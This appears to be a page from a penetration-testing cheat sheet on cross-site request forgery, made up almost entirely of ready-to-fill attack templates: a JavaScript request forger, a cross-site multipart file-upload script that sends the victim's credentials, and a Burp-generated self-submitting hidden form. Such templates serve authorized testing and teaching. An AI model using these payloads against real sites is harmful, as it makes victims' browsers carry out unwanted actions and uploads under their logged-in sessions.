CSRF

Cross-Site Request Forgery (CSRF)

Request

function req(method, url, body=null) {
    request = new XMLHttpRequest();
    request.open(method, url);
    if (method.localeCompare("POST") === 0) {
        request.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    }
    request.send(body);
    for(; request.readyState !== XMLHttpRequest.DONE;)
    return request;
}

function trigger_change(needed_value) {
    req("METHOD", "/ENDPOINT", "DATA (IF POST REQUEST)");
}

trigger_change("VALUE");

File Upload

var targetLocation= "/ENDPOINT";

function byteValue(x) {
    return x.charCodeAt(0) & 0xff;
}

function toBytes(datastr) {
    var ords = Array.prototype.map.call(datastr, byteValue);
    var ui8a = new Uint8Array(ords);
    return ui8a.buffer;
}

if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
	XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
	    this.send(toBytes(datastr));
	}
}

function fileUpload(fileData, fileName) {
	  var fileSize = fileData.length,
	    boundary = "--------------------------------1337", // MAX 70 chars.
	    uri = targetLocation,
	    xhr = new XMLHttpRequest();

	  var additionalFields = {
	  }

	  var fileFieldName = "fieldName";
	  
	  xhr.open("POST", uri, true);
	  xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*;q=0.8")
	  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request.
	  xhr.setRequestHeader("Content-Length", fileSize);
	  xhr.withCredentials = "true";
 
	  xhr.onreadystatechange = function() {
	    console.log(xhr.responseText);
	  }
	  
	  var body = "";
	  
	  for (var i in additionalFields) {
		  if (additionalFields.hasOwnProperty(i)) {
			  body += addField(i, additionalFields[i], boundary);
		  }
	  }

	  body += addFileField(fileFieldName, fileData, fileName, boundary);
	  body += "--" + boundary + "--";
	  xhr.sendAsBinary(body);
	  return true;
}

function addField(name, value, boundary) {
	var c = "--" + boundary + "\r\n"
	c += "Content-Disposition: form-data; name='" + name + "'\r\n\r\n";
	c += value + "\r\n";
	return c;
}

function addFileField(name, value, filename, boundary) {
    var c = "--" + boundary + "\r\n"
    c += "Content-Disposition: form-data; name='" + name + "'; filename='" + filename + "'\r\n";
    c += "Content-Type: application/x-compressed\r\n\r\n";
    c += value + "\r\n";
    return c;	
}

var start = function() {
	var c = "HEX-FILE-DATA"
	fileUpload(c, "FILE-NAME");
};

start();

Form Submit

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http(s)://server" method="POST">
      <input type="hidden" name="param1" value="1" />
      <input type="hidden" name="param2" value="2" />
      <input type="submit" value="Submit Request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

PreviousType Juggling NextSQL Injection

Last updated 5 years ago

Was this helpful?